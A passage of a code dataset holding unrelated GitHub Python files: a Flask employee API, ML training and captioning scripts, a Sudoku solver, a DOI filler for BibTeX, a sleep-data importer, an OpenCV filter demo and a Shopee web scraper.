EmployeeSchema(many=True)\n\t\temployees = schema.dump(employees)\n\t\treturn jsonify({'status':'success','employees':employees}), 200\n\texcept Exception as e:\n\t\tprint(e)\n\t\treturn jsonify({'status':'failed','msg':'An unknown error occured'}), 500\n\n\t\t\n@app.route('/api/v1/employee/', methods=['GET'])\n@jwt_required()\ndef get_employee(id):\n\ttry:\n\t\temployee = Employee.query.filter_by(id=id).first()\n\t\tif employee:\n\t\t\tschema = EmployeeSchema()\n\t\t\temployee = schema.dump(employee)\n\t\t\treturn jsonify({'status':'success','employee':employee}), 200\n\t\treturn jsonify({'status':'failed','msg':f'Employee with id {id} not found'}), 404\n\texcept Exception as e:\n\t\tprint(e)\n\t\treturn jsonify({'status':'failed','msg':'An unknown error occured'}), 500\n\t\t\n\t\t\n@app.route('/api/v1/employee/', methods=['PUT'])\n@jwt_required()\ndef update_employee(id):\n\ttry:\n\t\tdata = request.get_json()\n\t\temployee = Employee.query.filter_by(id=id).first()\n\t\tif employee:\n\t\t\tif employee.added_by.id == current_user.id:\n\t\t\t\t#makes sure that only the user who added this employee can update it\n\t\t\t\temployee.first_name = data.get('first_name',employee.first_name)\n\t\t\t\temployee.last_name = data.get('last_name', employee.last_name)\n\t\t\t\temployee.age = data.get('age',employee.age)\n\t\t\t\tdb.session.commit()\n\t\t\t\tschema = EmployeeSchema()\n\t\t\t\temployee = schema.dump(employee)\n\t\t\t\treturn jsonify({'status':'success','msg':'Update successful','employee':employee}), 200\n\t\t\treturn jsonify({'status':'failed','msg':'Operation not permitted'}), 401\n\t\treturn jsonify({'status':'failed','msg':'Employee not found'}), 404\n\texcept Exception as e:\n\t\tprint(e)\n\t\treturn jsonify({'status':'failed','msg':'Invalid input'}), 422\n\n\t\t\n@app.route('/api/v1/employee/', methods=['DELETE'])\n@jwt_required()\ndef delete_employee(id):\n\ttry:\n\t\temployee = Employee.query.filter_by(id=id).first()\n\t\tif employee:\n\t\t\tif employee.added_by.id == current_user.id:\n\t\t\t\t#ensures only users who added that employee could delete it\n\t\t\t\tdb.session.delete(employee)\n\t\t\t\tdb.session.commit()\n\t\t\t\treturn jsonify({'status':'success','msg':'Employee deleted successful'}), 200\n\t\t\treturn jsonify({'status':'failed','msg':'Operation not permitted'}), 401\n\t\treturn jsonify({'status':'failed','msg':'Employee not found'}), 404\n\texcept Exception as e:\n\t\tprint(e)\n\t\treturn jsonify({'status':'failed','msg':'Invalid input'}), 422\n\t\n\t\t\n","repo_name":"marvelous-benji/employee-api","sub_path":"employee_api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"39809647536","text":"import sys\nimport os\nprint(os.getcwd())\nsys.path.append('/opt/cocoapi/PythonAPI')\nfrom PIL import Image\nimport torch\nimport pickle\nfrom model import EncoderCNN, DecoderRNN\nfrom torchvision import transforms\n\nfrom matplotlib import pyplot as plt\ndef load_vocab():\n dict_object = pickle.load(open('vocab.pkl',\"rb\"))\n return dict_object.idx2word\n\n\ndef create_model():\n encoder_file = \"encoder-1.pkl\"\n decoder_file = \"decoder-1.pkl\"\n embed_size = 256\n hidden_size = 512\n vocab_size = 9955\n encoder = EncoderCNN(embed_size)\n encoder.eval()\n decoder = DecoderRNN(embed_size, hidden_size, vocab_size)\n decoder.eval()\n encoder.load_state_dict(torch.load(os.path.join('./models', encoder_file),map_location=torch.device('cpu')))\n decoder.load_state_dict(torch.load(os.path.join('./models', decoder_file),map_location=torch.device('cpu')))\n encoder.to('cpu')\n decoder.to('cpu')\n return encoder,decoder\n\ndef clean_sentence(output,idx2word):\n caption = list()\n sentence = \"\"\n\n for i in output:\n if (i == 1):\n continue\n caption.append(idx2word[i])\n\n caption = caption[1:-1]\n\n sentence = ' '.join(caption)\n\n sentence = sentence.capitalize()\n return sentence\n\ndef transform_image(transform_test,image_file):\n path = 'images/'\n image = Image.open(path+image_file)\n image = transform_test(image)\n image = torch.unsqueeze(image, dim=0)\n return image\n\ndef prediction(encoder,decoder,transform_test,idx2word,image_file_list):\n for image_file in image_file_list:\n features = encoder(transform_image(transform_test,image_file)).unsqueeze(1)\n output = decoder.sample(features)\n print(image_file+\": \"+clean_sentence(output,idx2word))\n plt.show()\n\nif __name__ == \"__main__\":\n\n sys.path.append('/opt/cocoapi/PythonAPI')\n\n transform_test = transforms.Compose([\n transforms.Resize(256),\n transforms.RandomCrop(224),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n transforms.Normalize((0.485, 0.456, 0.406),\n (0.229, 0.224, 0.225))])\n\n image_file_list = ['COCO_test2014_000000000001.jpg',\n 'COCO_test2014_000000000014.jpg',\n 'COCO_test2014_000000000016.jpg',\n 'COCO_test2014_000000000027.jpg',\n 'COCO_test2014_000000000057.jpg',\n 'COCO_test2014_000000000063.jpg',\n 'COCO_test2014_000000000069.jpg',\n 'coco.JPG',\n 'food.JPG']\n\n\n encoder,decoder = create_model()\n idx2word = load_vocab()\n prediction(encoder,decoder,transform_test,idx2word,image_file_list)\n","repo_name":"karanthacker/ImageCaptioning","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":2739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"17046813651","text":"import hydra\nimport wandb\nimport logging\nimport random\nfrom pytorch_lightning.loggers import CometLogger\n\nfrom omegaconf import DictConfig\nfrom pytorch_lightning import LightningDataModule, Trainer\nfrom pytorch_lightning.loggers import WandbLogger\nfrom pytorch_lightning.callbacks import LearningRateMonitor\nfrom pytorch_lightning.callbacks import ModelCheckpoint\n\nfrom src.models import LitModel\nfrom src.utils import log_hyperparams\n\nlog = logging.getLogger(__name__)\nlogging.getLogger(\"pytorch_lightning\").setLevel(logging.ERROR)\n\n\ndef get_checkpointing_callback(config):\n optional_str = \"\"\n # use hex to generate unique id\n random_str = hex(random.randint(0, 2**32))[2:]\n checkpoint_callback = ModelCheckpoint(\n dirpath=f\"checkpoints/{config.model.mode}/{random_str}/\",\n filename=f\"{config.mode}_{optional_str}_{{epoch:02d}}\",\n )\n return checkpoint_callback\n\n\ndef train(config: DictConfig, model=None):\n log.info(f\"Instantiating logger <{config.logger._target_}>\")\n\n current_name = f\"{config.datamodule.dataset}:{config.model.arch}:{config.mode}\"\n if config.mode == \"finetune_layers\":\n current_name += f\":{config.model.layers_to_finetune}\"\n\n logger: WandbLogger = hydra.utils.instantiate(config.logger, name=current_name)\n\n log.info(f\"Instantiating datamodule <{config.datamodule._target_}>\")\n datamodule: LightningDataModule = hydra.utils.instantiate(config.datamodule)\n\n if model is None:\n log.info(f\"Instantiating model <{config.model._target_}>\")\n model: LitModel = hydra.utils.instantiate(config.model)\n\n lr_monitor = LearningRateMonitor(logging_interval=\"epoch\")\n checkpointer = get_checkpointing_callback(config)\n callbacks = [lr_monitor, checkpointer]\n\n log.info(f\"Instantiating trainer <{config.trainer._target_}>\")\n trainer: Trainer = hydra.utils.instantiate(\n config.trainer,\n logger=logger,\n num_sanity_val_steps=0,\n callbacks=callbacks,\n )\n print(f\"precision {trainer.precision}\")\n\n log.info(\"Logging hyperparameters!\")\n log_hyperparams(config=config, trainer=trainer)\n\n log.info(\"Starting training!\")\n trainer.fit(model=model, datamodule=datamodule)\n\n wandb.finish()\n\n acc = trainer.callback_metrics[\"pred_acc\"]\n\n return acc.item()","repo_name":"talswisa/SubTuning","sub_path":"src/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2293,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"13713414068","text":"## Pizza Place\n\n#At Angelo’s Pizza Wheels, you have: \n#Three sauce options (red, white, and pesto)\n#Three cheese options (mozzarella, feta, and ricotta)\n#Eight toppings (olives, mushrooms, peppers, pepperoni, sausage, meatballs, arugula, and prosciutto)\n#Two glazes (olive oil and balsamic)\n\n#\n\nbasePizza =8\nitemizedBasePizzaPrice = 2\n#sauce\nred = 2\nwhite = 1\npesto =3\n\n# cheese\nmozzarella = 2\nfeta = 1\nricotta = 3\n\n# toppings\nolives = 0.5\nmushrooms = 0.5\npeppers = 0.5\npepperoni = 0.5\nsausage = 0.5\nmeatballs = 0.5\narugula = 0.5\nprosciutto = 0.5\n\n#premium toppings\nburrata = 2.50\navocado = 2.50\nbbqChicken = 2.50\n\n\n\ntoppings = [\"olives\", \"mushrooms\", \"peppers\", \"pepperoni\", \"sausage\", \"meatballs\", \"arugula\", \"prosciutto\" ]\npremiumtoppings = [\"burrata\", \"avocado\", \"bbqChicken\"]\n\ndef CalculateItemizedPizzaPrice(sauce, cheese, toppings, glaze): \n return CalculateSaucePrice(sauce) + CalculateCheesePrice(cheese)\n \n \ndef CalculateSaucePrice(sauce):\n if(sauce == \"red\"): \n sPrice= red\n if(sauce == \"white\"): \n sPrice= white\n if(sauce == \"pesto\"): \n sPrice= pesto \n return sPrice\n\ndef CalculateCheesePrice(cheese):\n if(mozzarella == \"mozzarella\"): \n cPrice= red\n if(feta == \"feta\"): \n cPrice= white\n if(ricotta == \"ricotta\"): \n cPrice= pesto \n return cPrice\n\n\n\ndef CalculatePizzaPrice(toppings):\n return 8+(toppings*.5)\n\ndef CalculatePizzaPriceWithPremium(toppings, premium_toppings):\n return CalculatePizzaPrice(toppings)+(premium_toppings*2)\n\n\norder1 = CalculatePizzaPrice(2)\nprint(\"Order1: \" + order1)\n\norder2 = CalculatePizzaPrice(3)\nprint(\"Order2: \" +order2)\n\norder3 = CalculatePizzaPriceWithPremium(3,5)\nprint(\"Order3: \" + order3)\n\n","repo_name":"DataScienceWorkSpace/data-analytics-portfolio","sub_path":"Activity132.py","file_name":"Activity132.py","file_ext":"py","file_size_in_byte":1727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"74931889125","text":"#!/usr/bin/python\n# -*- coding:utf-8 -*-\nimport cv2\nimport numpy as np\n\nfn = \"images/for_test.jpg\"\nsrc_img = cv2.imread(fn)\nimg = cv2.cvtColor(src_img, cv2.COLOR_BGR2GRAY)\n\n# add spiced salt noise\n\nw, h = img.shape[1], img.shape[0] # gray scale range\nnew_img = np.array(img)\n# the number of noise dots\nnoise_count = 60000\nfor k in range(0, noise_count):\n\txi = int(np.random.uniform(0, new_img.shape[1]))\n\txj = int(np.random.uniform(0, new_img.shape[0]))\n\tnew_img[xj, xi] = 255\n\ncv2.imshow('src noised sample_img', new_img)\n\n# median filter\nmfiltered_img = cv2.medianBlur(new_img, 5)\ncv2.imshow('median filter', mfiltered_img)\n# average filter\nafiltered_img = cv2.blur(new_img, (5, 5))\ncv2.imshow('average filter', afiltered_img)\n# gaussian filter\ngfiltered_img = cv2.GaussianBlur(new_img, (5, 5), 0)\ncv2.imshow('gaussian filter', gfiltered_img)\n# bilateral filter\nbfiltered_img = cv2.bilateralFilter(new_img, 9, 75, 75)\ncv2.imshow('bilateral filter', bfiltered_img)\n\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n","repo_name":"SimonCqk/Python_Toys","sub_path":"opencv/img_filters.py","file_name":"img_filters.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"30093491277","text":"import pygame\nfrom justwar.data.Config import Config\nfrom justwar.data.GameElement import GameElement\nfrom random import randint\n\nclass Gate(GameElement):\n\n\tdef __init__(self, direction):\n\n\t\tGameElement.__init__(self)\n\n\t\tself.direction = direction\n\n\t\tself.shape = self.load_image(\"gate.png\")\n\t\tself.coord = ( Config.screenWidth-600, 0 ) \n\n\t\tif direction == 1:\n\t\t\tself.shape = pygame.transform.rotate(self.shape, -90)\n\t\t\tself.coord = ( Config.screenWidth-self.shape.get_width()-10, Config.screenHeight-370 )\n\n\t\tif direction == 2:\n\t\t\tself.shape = pygame.transform.rotate(self.shape, -180)\n\t\t\tself.coord = ( Config.screenWidth-600, Config.screenHeight-self.shape.get_height() )\n\n\t\tif direction == 3:\n\t\t\tself.shape = pygame.transform.rotate(self.shape, 90)\n\t\t\tself.coord = ( 0+10, Config.screenHeight-370 )\n\n\t\tself.width = self.shape.get_width()\n\t\tself.height = self.shape.get_height()\n\n\t\tself.rect = pygame.Rect(self.coord,(self.width, self.height))\n\n\n\tdef Show(self, surface):\n\t\tsurface.blit(self.shape, self.coord)\n","repo_name":"PanosRCng/just_war","sub_path":"justwar/data/Gate.py","file_name":"Gate.py","file_ext":"py","file_size_in_byte":1014,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"14196898614","text":"import numpy as np\nimport pandas as pd\n\n\ndef update_missing_values(groups: dict, freq: str):\n \"\"\"\n Update the missing values in the 'data', 'full_data', 'data_matrix', and 'dates' arrays with np.nan\n\n Args:\n groups: dictionary containing the data and metadata\n \"\"\"\n for key in ['train']:\n x_values = groups[key]['x_values']\n data = groups[key]['data']\n s = groups[key]['s']\n\n # Change the data type of the arrays to float\n data = data.astype(float)\n\n # Identify the missing indices in x_values\n missing_indices = sorted(set(range(max(x_values) + 1)) - set(x_values))\n\n # Update the 'data' array with np.nan for the missing values\n for missing_idx in missing_indices:\n insert_idx = missing_idx * s\n data = np.insert(data, insert_idx, [np.nan] * s)\n\n # Update the 'n' value in the metadata\n groups[key]['n'] = len(x_values) + len(missing_indices)\n\n full_data = groups[key]['full_data']\n full_data = full_data.astype(float)\n groups[key]['data'] = data\n\n # Update the 'full_data' array with np.nan for the missing values\n for missing_idx in missing_indices:\n insert_idx = missing_idx * s\n full_data = np.insert(full_data, insert_idx, [np.nan] * s)\n\n groups[key]['full_data'] = full_data\n\n # Update the 'dates' array to fill in missing dates\n dates = groups['dates']\n start_date = dates[0]\n end_date = dates[-1]\n all_dates = pd.date_range(start_date, end_date, freq=freq)\n missing_dates = all_dates.difference(pd.to_datetime(dates))\n\n for missing_date in missing_dates:\n insert_idx = all_dates.get_loc(missing_date)\n dates.insert(insert_idx, missing_date)\n\n groups['dates'] = dates\n\n return groups\n\n","repo_name":"luisroque/run_hierarchical_forecasting_models","sub_path":"htsmodels/preprocessing/subsampled_dataset.py","file_name":"subsampled_dataset.py","file_ext":"py","file_size_in_byte":1820,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"15470885309","text":"import torch\nimport numpy as np\nimport glob\nimport uproot\n# from torch_cmspepr.dataset import incremental_cluster_index_np\n\ndef get_model():\n from torch_cmspepr.gravnet_model import GravnetModelWithNoiseFilter\n model = GravnetModelWithNoiseFilter(input_dim=9, output_dim=6, k=50, signal_threshold=.05)\n ckpt = 'ckpt_train_taus_integrated_noise_Oct20_212115_best_397.pth.tar'\n model.load_state_dict(torch.load(ckpt, map_location=torch.device('cpu'))['model'])\n return model\n\n\ndef interface():\n t = uproot.open('hgcalNtuple_Nov16_2021.root')['ana']['hgc']\n arrays = t.arrays()\n print (arrays)\n with torch.no_grad():\n model = get_model() #torch.load('gravnetwithnoisefilter.model')\n print ('here after loading the model')\n model.eval()\n print ('here after evaluating the model')\n for i in range(t.num_entries):\n if i == 2: break\n #e = np.array(arrays['RecHitHGC_energy'][i])\n #x = np.array(arrays['RecHitHGC_x'][i])\n #y = np.array(arrays['RecHitHGC_y'][i])\n #z = np.array(arrays['RecHitHGC_z'][i])\n #t = np.array(arrays['RecHitHGC_time'][i])\n e = np.array(arrays['rechit_energy'][i])\n x = np.array(arrays['rechit_x'][i])\n y = np.array(arrays['rechit_y'][i])\n z = np.array(arrays['rechit_z'][i])\n t = np.array(arrays['rechit_time'][i])\n\n nhits = e.shape[0]\n\n r = np.sqrt(x**2 + y**2 + z**2)\n\n d = np.sqrt(x**2 + y**2)\n theta = np.arctan2(d, z)\n eta = -np.log(np.tan(theta/2.))\n\n # Make sure phi is within -pi..pi\n phi = np.arctan2(x, y) % (2.*np.pi)\n phi[phi > np.pi] -= 2.*np.pi\n\n features = np.vstack((\n e,\n eta,\n np.zeros_like(e),\n theta,\n r,\n x,\n y,\n z,\n t\n )).T\n\n assert features.shape == (nhits, 9)\n print ('here after defining features')\n # This should be the truth clustering\n #y = np.array(arrays['RecHitHGC_BestMergedSimClusterIdx'][i])\n # y = incremental_cluster_index_np(y, noise_index=-1)\n #assert y.shape == (nhits,)\n\n\n X = torch.Tensor(features)\n batch = torch.zeros(nhits, dtype=torch.long)\n print (\"X = \", X)\n scores_noise_filter, pass_noise_filter, out_gravnet = model(X, batch)\n print (\"scores_noise_filter = \", scores_noise_filter)\n print(scores_noise_filter, pass_noise_filter, out_gravnet)\n\n\n\nif __name__ == '__main__':\n interface()\n","repo_name":"Saptaparna/FastTiming","sub_path":"Production_12X/ForACAT/ParseOutput/interface_single_photons.py","file_name":"interface_single_photons.py","file_ext":"py","file_size_in_byte":2718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"7141658167","text":"import numpy as np # linear algebra\r\nimport pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)\r\nimport scipy.sparse as scs # sparse matrix construction \r\nimport scipy.linalg as scl # linear algebra algorithms\r\nimport scipy.optimize as sco # for minimization use\r\nimport matplotlib.pylab as plt # for visualization\r\nfrom numpy import linalg as LA\r\ndef fixed_constraints(N=9):\r\n rowC = np.zeros(N)\r\n rowC[0] =1\r\n rowR = np.zeros(N)\r\n rowR[0] =1\r\n row = scl.toeplitz(rowC, rowR)\r\n ROW = np.kron(row, np.kron(np.ones((1,N)), np.eye(N)))\r\n \r\n colR = np.kron(np.ones((1,N)), rowC)\r\n col = scl.toeplitz(rowC, colR)\r\n COL = np.kron(col, np.eye(N))\r\n \r\n M = int(np.sqrt(N))\r\n boxC = np.zeros(M)\r\n boxC[0]=1\r\n boxR = np.kron(np.ones((1, M)), boxC) \r\n box = scl.toeplitz(boxC, boxR)\r\n box = np.kron(np.eye(M), box)\r\n BOX = np.kron(box, np.block([np.eye(N), np.eye(N) ,np.eye(N)]))\r\n \r\n cell = np.eye(N**2)\r\n CELL = np.kron(cell, np.ones((1,N)))\r\n \r\n return scs.csr_matrix(np.block([[ROW],[COL],[BOX],[CELL]]))\r\n\r\n\r\n# For the constraint from clues, we extract the nonzeros from the quiz string.\r\ndef clue_constraint(input_quiz, N=9):\r\n m = np.reshape([int(c) for c in input_quiz], (N,N))\r\n r, c = np.where(m.T)\r\n v = np.array([m[c[d],r[d]] for d in range(len(r))])\r\n \r\n table = N * c + r\r\n table = np.block([[table],[v-1]])\r\n \r\n # it is faster to use lil_matrix when changing the sparse structure.\r\n CLUE = scs.lil_matrix((len(table.T), N**3))\r\n for i in range(len(table.T)):\r\n CLUE[i,table[0,i]*N + table[1,i]] = 1\r\n # change back to csr_matrix.\r\n CLUE = CLUE.tocsr() \r\n \r\n return CLUE\r\n\r\n\r\nfrom collections import defaultdict\r\ndef boxes():\r\n\r\n index = defaultdict(list)\r\n ind = []\r\n for i in range(9):\r\n for j in range(9):\r\n ind.append([i,j])\r\n res1 = []\r\n res2 = []\r\n res3 = []\r\n res4 = []\r\n res5 = []\r\n res6 = []\r\n res7 = []\r\n res8 = []\r\n res9 = []\r\n for item in ind:\r\n i = item[0]\r\n j = item[1]\r\n if i%9>=0 and i%9<=2:\r\n if j%9>=0 and j%9<=2:\r\n res1.append(item)\r\n if i%9>=0 and i%9<=2:\r\n if j%9>=3 and j%9<=5:\r\n res2.append(item)\r\n if i%9>=0 and i%9<=2:\r\n if j%9>=6 and j%9<=8:\r\n res3.append(item)\r\n if i%9>=3 and i%9<=5:\r\n if j%9>=0 and j%9<=2:\r\n res4.append(item)\r\n\r\n if i%9>=3 and i%9<=5:\r\n if j%9>=3 and j%9<=5:\r\n res5.append(item)\r\n if i%9>=3 and i%9<=5:\r\n if j%9>=6 and j%9<=8:\r\n res6.append(item)\r\n if i%9>=6 and i%9<=8:\r\n if j%9>=0 and j%9<=2:\r\n res7.append(item)\r\n\r\n if i%9>=6 and i%9<=8:\r\n if j%9>=3 and j%9<=5:\r\n res8.append(item)\r\n if i%9>=6 and i%9<=8:\r\n if j%9>=6 and j%9<=8:\r\n res9.append(item)\r\n box = [res1, res2, res3, res4, res5, res6, res7, res8, res9]\r\n return box\r\nfrom collections import defaultdict\r\ndef repeats(matrix, original):\r\n #print(matrix)\r\n temp = defaultdict(list)\r\n marked_matrix = np.ones((9,9))\r\n for i in range(9):\r\n for j in range(9):\r\n mark = False\r\n val = matrix[i][j]\r\n temp[val].append([i,j])\r\n #print(val)\r\n \r\n for l in range(9):\r\n if matrix[l][j] == val and i!= l:\r\n mark = True\r\n\r\n marked_matrix[l][j] = 0\r\n temp[val]\r\n \r\n \r\n #print(marked_matrix)\r\n for k in range(9):\r\n if matrix[i][k]== val and k!= j:\r\n mark = True\r\n marked_matrix[i][k] = 0\r\n \r\n for res in boxes():\r\n if [i,j] in res:\r\n for each_sq in res:\r\n a = each_sq[0]\r\n b = each_sq[1]\r\n if matrix[a][b] == val and [a,b] != [i,j] :\r\n mark = True\r\n marked_matrix[a][b] = 0\r\n \r\n if mark == True:\r\n marked_matrix[i][j] = 0\r\n \r\n for i in range(9):\r\n for j in range(9):\r\n if marked_matrix[i][j] ==0:\r\n matrix[i][j] = 0\r\n for i in range(9):\r\n for j in range(9):\r\n if original[i][j] != 0 :\r\n matrix[i][j] = original[i][j]\r\n \r\n\r\n return matrix\r\n \r\n\r\n\r\ndef convert_stringtoarray(quiz):\r\n #can work for original and solution\r\n res = []\r\n count = 0\r\n for i in range(9):\r\n temp = []\r\n for j in range(9):\r\n temp.append(int(quiz[count]))\r\n count+=1\r\n res.append(temp)\r\n\r\n return res\r\n\r\ndef convert_matrixtolist(after_del):\r\n res = []\r\n for i in after_del:\r\n for j in i:\r\n res.append(j)\r\n \r\n return res\r\n\r\ndef solver(input_):\r\n \r\n quiz = input_\r\n constraint_ = input_\r\n iter_ = 0\r\n X_re = 0\r\n while(iter_<=5):\r\n \r\n A0 = fixed_constraints()\r\n A1 = clue_constraint(constraint_)\r\n # Formulate the matrix A and vector B (B is all ones).\r\n A = scs.vstack((A0,A1))\r\n A = A.toarray()\r\n B = np.ones(A.shape[0])\r\n # Because rank defficiency. We need to extract effective rank.\r\n u, s, vh = np.linalg.svd(A, full_matrices=False)\r\n K = np.sum(s > 1e-12)\r\n S = np.block([np.diag(s[:K]), np.zeros((K, A.shape[0]-K))])\r\n A = S@vh\r\n B = u.T@B\r\n B = B[:K]\r\n c = np.block([ np.ones(A.shape[1]), np.ones(A.shape[1]) ])\r\n\r\n G = np.block([[-np.eye(A.shape[1]), np.zeros((A.shape[1], A.shape[1]))],\\\r\n [np.zeros((A.shape[1], A.shape[1])), -np.eye(A.shape[1])]])\r\n h = np.zeros(A.shape[1]*2)\r\n H = np.block([A, -A])\r\n b = B\r\n L = 25\r\n epsilon = 10**-10\r\n\r\n #x_new = x_ori #? or below one?\r\n x_top = np.zeros(A.shape[1])\r\n x_bottom = np.zeros(A.shape[1])\r\n x_ori = x_top - x_bottom\r\n for j in range(L):\r\n Weight = 1/(abs(x_ori)+1)\r\n\r\n\r\n W = np.block([Weight,Weight])\r\n\r\n\r\n cW = np.matrix(c*W)\r\n\r\n \r\n ret = sco.linprog(cW, G, h, H, b, method='interior-point', options={'tol':1e-10})\r\n x_new = ret.x[:A.shape[1]] - ret.x[A.shape[1]:]\r\n\r\n\r\n #x_new = np.reshape(x, (81, 9))\r\n if LA.norm((x_new - x_ori)) 0:\n # Sort items by published date (newest first)\n items = sorted(data['message']['items'], key=lambda x: x.get('created', {}).get('date-time'), reverse=True)\n \n # Prepare title for comparison\n title_lower = prepare_title(title)\n \n # Search for DOI\n for item in items:\n item_title = item.get('title', [''])[0]\n \n # Prepare title for comparison\n item_title_lower = prepare_title(item_title)\n\n # print('Comparing:\\n', title_lower, '\\n', item_title_lower, '\\n') # (debug)\n \n # Compare titles\n if title_lower in item_title_lower:\n doi = item['DOI']\n if not doi.endswith('.vid'):\n return doi\n \n return ''\n\ndef process_bib_line(line, current_item):\n if line.startswith('@'):\n if current_item:\n updated_bib_data.append(current_item.strip())\n current_item = line.strip()\n return current_item\n \n if current_item and line.startswith('}'):\n if 'doi' not in current_item.lower() and '@book' not in current_item.lower():\n title_match = title_regex.search(current_item)\n if title_match:\n title = title_match.group(1).strip()\n # Remove additional curly braces\n title = re.sub(r'[{}]', '', title)\n # Get doi\n doi = get_doi(title)\n if doi:\n # Adjusted indentation for field name\n indent = ' ' * INDENT_PRE\n # Adjusted indentation for field line\n field_line = f'{indent}doi{\" \" * (INDENT_POST - 3)} = {{{doi}}}'\n # Append DOI field with indentation\n current_item += ',\\n' + field_line \n # Print DOI found\n print('DOI found for article:', title, '->', doi)\n else:\n # Print DOI not found\n print('DOI not found for article:', title)\n \n current_item += '\\n' + line.strip()\n updated_bib_data.append(current_item)\n current_item = ''\n else:\n if '=' in line:\n field_name, field_value = line.split('=', 1)\n field_name = field_name.strip()\n field_value = field_value.strip()\n indent = ' ' * (INDENT_POST - len(field_name))\n line = f'{field_name} {indent}= {field_value}'\n current_item += '\\n' + ' ' * INDENT_PRE + line.strip()\n \n return current_item\n\n\n# Compile the regular expressions\ntitle_regex = re.compile(r'title\\s*=\\s*\\{([^}]*)\\}')\n\nwith open(input_file, 'r') as f:\n bib_data = f.readlines()\n\n# Search and fill missing DOIs\nupdated_bib_data = []\ncurrent_item = ''\n\nfor line in bib_data:\n current_item = process_bib_line(line, current_item)\n\n# Save the updated .bib file\nif current_item:\n updated_bib_data.append(current_item.strip())\n\nupdated_bib_content = '\\n'.join(updated_bib_data)\n\nwith open(output_file, 'w') as f:\n f.write(updated_bib_content)\n\nprint('Updated .bib file saved as', output_file)\n","repo_name":"AlbertoCuadra/doi_scraper","sub_path":"doi_scraper.py","file_name":"doi_scraper.py","file_ext":"py","file_size_in_byte":4374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"5239534865","text":"import re\nimport just\nimport json\nimport pandas as pd\nimport getpass\n\nfrom nostalgia.ndf import NDF\nfrom nostalgia.times import tz\n\nlogin_url = \"https://s.sleepcycle.com/site/login\"\nexport_url = \"https://s.sleepcycle.com/export/original\"\n\n\nclass SleepCycle(NDF):\n @classmethod\n def ingest(cls, credentials, **kwargs):\n html = just.get(login_url)\n token = re.findall('name=\"csrftoken\" value=\"([^\"]+)', html)[0]\n\n data = {\n \"username\": credentials.username,\n \"csrftoken\": token,\n \"password\": credentials.password,\n }\n _ = just.post(login_url, data=data)\n\n str_data = just.get(\"https://s.sleepcycle.com/export/original\")\n\n start = str_data.index(\"data_json.txt\") + len(\"data_json.txt\")\n end = str_data[start:].index(\"}]PK\") + 2\n\n data = json.loads(str_data[start:][:end])\n\n xs = []\n ys = []\n nums = []\n for num, x in enumerate(data):\n res = []\n times = []\n if len(x[\"events\"]) < 15:\n continue\n for y in x[\"events\"]:\n res.append(y[-1])\n times.append(y[0])\n nums.append(num)\n xs.extend(\n [\n pd.Timestamp(x[\"start\"], tz=tz) + pd.Timedelta(seconds=int(y))\n for y in pd.Series(times).rolling(15).mean().fillna(method=\"bfill\")\n ]\n )\n ys.extend(pd.Series(res).rolling(15).mean().fillna(method=\"bfill\"))\n df = pd.DataFrame({\"time\": xs, \"score\": ys, \"num\": nums}).drop_duplicates()\n df[\"score\"] = df[\"score\"].clip(0, 0.025)\n\n cls.save_df(df)\n\n return cls(df)\n","repo_name":"nostalgia-dev/nostalgia","sub_path":"nostalgia/sources/sleepcycle.py","file_name":"sleepcycle.py","file_ext":"py","file_size_in_byte":1710,"program_lang":"python","lang":"en","doc_type":"code","stars":160,"dataset":"github-code","pt":"52"} +{"seq_id":"2378063419","text":"from selenium import webdriver\nfrom selenium.webdriver.chrome.service import Service\nfrom bs4 import BeautifulSoup\nimport pandas as pd\nimport time\n\n\nopsi = webdriver.ChromeOptions()\nopsi.add_argument('--headless')\nservices = Service('chromedriver')\ndriver = webdriver.Chrome(service=services, options=opsi)\n\nshopee_link = 'https://shopee.co.id/search?keyword=macbook'\ndriver.set_window_size(1300,800)\ndriver.get(shopee_link)\n\nrentang = 800\nfor i in range(1,7):\n akhir = rentang*i\n perintah = \"window.scrollTo(0,\"+str(akhir)+\")\"\n driver.execute_script(perintah)\n print('loading ke-'+str(i))\n time.sleep(1)\n\ntime.sleep(30)\n\ndriver.save_screenshot(\"home.png\")\ncontent = driver.page_source\ndriver.quit\n\ndata = BeautifulSoup(content, 'html.parser')\n# print(data.encode(\"utf-8\"))\ni = 1\nbase_url = 'https://shopee.co.id'\n\nno,list_nama, list_gambar, list_harga, list_link, list_terjual, list_lokasi = [],[],[],[],[],[],[]\n\nfor area in data.find_all('div', class_=\"col-xs-2-4 shopee-search-item-result__item\"):\n print(i)\n nama = area.find('div', class_=\"ie3A+n bM+7UW Cve6sh\").get_text()\n gambar = area.find('img', class_=\"_7DTxhh vc8g9F\")['src']\n\n if gambar != None:\n gambar = area.find('img', class_=\"_7DTxhh vc8g9F\")['src']\n else:\n gambar = '-'\n\n harga = area.find('span', class_=\"ZEgDH9\").get_text()\n link = base_url + area.find('a')['href']\n terjual = area.find('div', class_=\"r6HknA uEPGHT\") \n\n if terjual != None:\n terjual = area.find('div', class_=\"r6HknA uEPGHT\").get_text()\n else:\n terjual = '0 Terjual'\n\n lokasi = area.find('div', class_=\"zGGwiV\").get_text()\n\n no.append(i)\n list_nama.append(nama)\n list_gambar.append(gambar)\n list_harga.append(harga)\n list_link.append(link)\n list_terjual.append(terjual)\n list_lokasi.append(lokasi)\n i += 1\n print(\"------\")\n\ndf = 